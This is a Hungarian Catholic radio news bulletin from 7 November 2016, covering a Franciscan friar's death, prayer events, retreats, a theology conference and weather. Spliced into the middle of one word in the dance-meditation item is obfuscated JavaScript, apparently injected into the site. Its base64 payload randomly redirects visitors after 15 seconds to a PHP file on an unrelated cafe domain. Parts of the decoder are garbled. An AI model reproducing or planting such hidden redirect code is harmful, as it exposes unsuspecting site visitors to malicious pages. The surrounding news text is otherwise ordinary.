2016. november 7. – Hírek és programajánló

H Í R E K   E S T E

Elhunyt P. Ferencz Béla Ervin OFM
Életének 97., áldozópapságának 74. évében a csíksomlyói kolostorban a tegnap reggel elhunyt az erdélyi Szent Istvánról nevezett Ferences Rendtartomány legidősebb tagja, P. Ferencz Béla Ervin OFM – tudtuk meg a Gyulafehérvári Érsekség honlapjáról.
Ervin atya csíksomlyói búcsúztatása ma délután négy órakor volt a kegytemplomban, holnap szülőfalujában, Gyergyószárhegyen ravatalozzák fel, temetésére november 9-én, szerdán a délután egy órakor kezdődő szentmise után kerül sor a gyergyószárhegyi ferences kolostor temetőjében.
P. Ervin 1920. május 10-én született Gyergyószárhegyen, 1938. október 6-án Medgyesen öltötte magára Szent Ferenc ruháját a Kisebb Testvérek Rendjének Erdélyi Tartományában, és 1943. június 20-án Gyulafehérváron szentelték pappá. Lelkipásztorként többek között Kolozsváron, Székelyudvarhelyen, Zetelakán, Tornyán, Désen, Déván, Fogarason és Gyergyószárhegyen tevékenykedett. Életét az evangéliumért és az igazságért való kiállás jellemezte, amelyért a kommunizmus ideje alatt két alkalommal is börtönt viselt, és sok-sok csatát vívott.
2013-ban került Csíksomlyóra, ahol a Szűzanya lábánál erejéhez mérten a legutolsó időszakig fáradozott a lelkek üdvösségén, és az örök életbe vetett hittel készült az Úr Jézussal való találkozásra, akit életében kitartóan szolgált.
Az örök világosság fényeskedjék neki!

Isten a döntésekben-Bibliás program
A 121-ik zsoltár állt a november 5-én, szombaton szervezett Bibliás program középpontjában. A szatmárnémeti Szentlélek templom Merk Mihály termében reggel, előbb mindenki maga megvizsgálta, milyen a kapcsolata a Szentírással, milyen helyet foglal el az életében? Ez lehetőséget adott a beszélgetésekre, s mint többen elmondták, a gondolataik rendezésére is.
Vojtku László plébános tartott előadást, amelyben előbb a zsoltárok születésének körülményeiről, történeti keretéről beszélt, majd azok Egyházban való működéséről – imádkozták, énekelték, a zsolozsmába és a szentmisébe is befoglalták ezeket.
A zsoltárok alaposabb megismerése, azok üzenetei többeknek mélyebb kíváncsiságát váltotta ki. A résztvevők közül többen is megvallották, a jövőben szeretnék az Egyház imáját, vagyis a zsolozsmát imádkozni, amely a papoknak és szerzeteseknek kötelező, de híveknek is ajánlott.

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében holnap  Kézdiszentléleken tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

A Szent Márton Öregotthon kápolnájának búcsúja
2016. november 11-én, pénteken délután öt órakor a Szent Márton Öregotthon lakói és alkalmazottai körében Böcskei László megyés püspök mutatja be az intézmény kápolnájának búcsús szentmiséjét.

Táncmeditációs lelkigyakorlat Kolozsváron
November 11-én pénteken este hét órakor kezdődik a havi rendszerességgel tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó táncmeditációs lelkigyakorlat Kolozsváron. A táncmeditáció az imádság olyan lehetősége, amelyben a zene, a mozgás, a tánc utat nyit gondolatainknak, érzéseinknek, segít közelebb kerülni Istenhez, önmagunkhoz, társainkhoz - vallják a szervezők. Várnak minden olyan férfit és nőt, aki szeretne megismerkedni a test és lélek ilyen fajta imájával, biblikus körtáncok és a zsidó tánclépéseken keresztül találkozni Istennel. A helyek száma korlátozott. Jelentkezni november 8-ig lehet Imre Editnél a 0741-114.036-os telefonszámon vagy az editimre55@yahoo.com email címen. Helyszín a Szentegyház utca 7 szám.

Templom megáldása Sólyomkőváron
2016. november 12-én, szombaton délelőtt tizenegy órakor Böcskei László megyés püspök ünnepélyes hállaadó szentmise keretében áldja meg a felújított sólyomkővári templomot.

Filmes lelkigyakorlat Csíkszentdomokoson
December 1-4. között Csíkszentdomokoson a Szent Margit Lelkigyakorlatos Házban Bereczki Silvia és Kerekes Izabella segítőnővérek vezetésével filmes lelkigyakorlatot lesz, teljes csenddel és személyes kísérettel. Jelentkezni november 24-ig lehet a bereczkis2002@yahoo.com e-mailcímen.

Időjárás: Holnap kezdetben a déli tájakon, majd nyugaton, a középső országrészben és az esti órákban már keleten is várható csapadék. A hegyvidéken havas eső, hó is eshet.  A légmozgás jelentősen veszít erejéből. Hajnalra az erdélyi medence térségében fagypont köré csökken a hőmérséklet, nappal csupán 3-12 fok körüli értékekre számíthatunk.

MRE - Hírszolgálat, 2016. november 7.


H Í R E K   R E G G E L / D É L B E N

Elhunyt P. Ferencz Béla Ervin OFM
Életének 97., áldozópapságának 74. évében a csíksomlyói kolostorban a tegnap reggel elhunyt az erdélyi Szent Istvánról nevezett Ferences Rendtartomány legidősebb tagja, P. Ferencz Béla Ervin OFM – tudtuk meg a Gyulafehérvári Érsekség honlapjáról.
Ervin atya csíksomlyói búcsúztatása ma délután négy órakor kezdődik a kegytemplomban, temetése szerdán lesz szülőfalujában, Gyergyószárhegyen.
Az örök világosság fényeskedjék neki!

Ima - összefogás a marosvásárhelyi római katolikus iskola megmaradásáért
Közös imára hívnak minden jószándékú embert felekezeti hovatartozás nélkül, ma este hét órára Marosvásárhelyen, a Keresztelő Szent János-plébániatemplomba, hogy közös összefogással, az imába egyesülve álljunk ki magyar és keresztény jogaink védelmébe, a katolikus és magyar iskoláink megmentése érdekében! A szervezők kérik, hogy Kárpát-medence szerte csatlakozzanak az imához, mert ha Isten velünk ki lehet ellenünk! Vele ezt a megpróbáltatást is legyőzhetjük!

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében a mai nap folyamán  a lemhényi templomban tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Isten neve az irgalmasság - interaktív kiállítás Kolozsváron
A Szent Év utolsó heteiben, november 7-30. között, Kolozsváron a Szent Mihály plébánia meghívására, a Kolozsvári Egyetemi Lelkészséggel közösen a Irgalmasság kiállítás megnyitja kapuját az érdeklődők előtt.
Az interaktív kiállítás segít megvilágítani, megélni, hogy életünkben milyen szerepet játszik az irgalmasság, a megbocsátás, az Istennel, önmagunkkal és az emberekkel való megbékélés. Van-e bátorságunk elindulni , bízva abban, hogy „Atyám házában sok hely van,…” és ott engem szeretettel várnak.
A kiállítás helyszíne: Agapé szálloda, Szentegyház u. 2. szám, II.emelet, konferenciaterem.
A szervezők várják azokat az érdeklődőket, akik készek valami újat megélni. A kiállításon előzetes bejelentkezés alapján lehet részt venni a következő elérhetőségeken: 0746-311520-as telefonszámon vagy a msferencz@gmail.com e-mailcímen.

Ifi találkozó Szentegyházán
Az irgalmasság témával kapcsolatban együttgondolkodásra, találkozásra hívja november hónapban, hetente egyszer a kerekesszékes és egészséges fiatalokat Szentegyházán, a Szent Gellért Alapítvány.
A következő találkozás november 11-én, pénteken este fél nyolc órakor lesz, a Jézus Szíve Plébánia Ifiházban.
Témája: „Börtönlelkészi élményeim”
 A találkozások célja, hogy jól érezzék magukat, megosszák gondolataikat, problémáikat, elmondják véleményüket, álláspontjukat, egy-egy „lelki” vezetővel. Az együttlét alkalmával mély beszélgetésekre, filmnézésre, alkotásra, lelki nevelésre, játékra kerül sor. A cél, hogy a fiatalok és a mozgásukban korlátozottak is lehetőséget kapjanak a „mélyebb" szórakozásra.

Teológia a társadalomért
A Babeș-Bolyai Tudományegyetem Római Katolikus Teológia Kara 20 éves születésnapját ünnepli. 2016. november 11-13. között Teológia a társadalomért címmel nemzetközi szakmai konferenciát szervez Kolozsváron. A konferencia programja a www. romkat.ro honlapon taláható. A részvétel ingyenes, de szükséges az előzetes regisztráció a Római Katolikus Teológia Kar honlapján és facebook - oldalán elérhető elektronikus űrlap kitöltésével és elküldésével: www.rocateo.ubbcluj.ro vagy www.facebook.com/rocateo.

Koraszülöttek hete - Székelyudvarhelyen
November 17-én van a koraszülöttek nemzetközi világnapja. Ez alkalomból a Gyulafehérvári Caritas Korai Nevelő- és Fejlesztőközpont székelyudvarhelyi munkatársai egész hetes programsorozattal készülnek 2016. november 14-19. között.
A koraszülöttek hetét a Pici baba, nagy lépés… című fotókiállítással indítják, ahol koraszülött kisbabák fényképeit lehet megtekinteni az egész hét során. A kiállításra november 9-ig várják koraszülött kisbabák/gyerekek fényképeit.
Bővebben a programról a www.caritas-ab.ro oldalon olvashatnak. Érdeklődni és a programokra jelentkezni a 0735-735151-es telefonszámon lehet.

Isten a hétköznapjaimban - Férjek és édesapák hétvégéje
A székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban Isten a hétköznapjaimban címmel november 2016. november 18-20. között férjeknek és édesapáknak tart lelkigyakorlatot  Simon András budapesti grafikusművész. Jelentkezni november 14-ig lehet a 0755-489743-as telefonszámon.

Időjárás: Ma reggel még keleten, északkeleten eshet. Napközben nyugat felől egyre többfelé felszakadozik, majd ismét megnövekszik a felhőzet. Estefelé nyugaton, délnyugaton még előfordulhat csapadék. Élénk marad a szél.  Az enyhe reggelt követően nappal 12-16 fokot mérhetünk. 

MRE - Hírszolgálat, 2016. november 7.

About the author

maradmin

Leave a Comment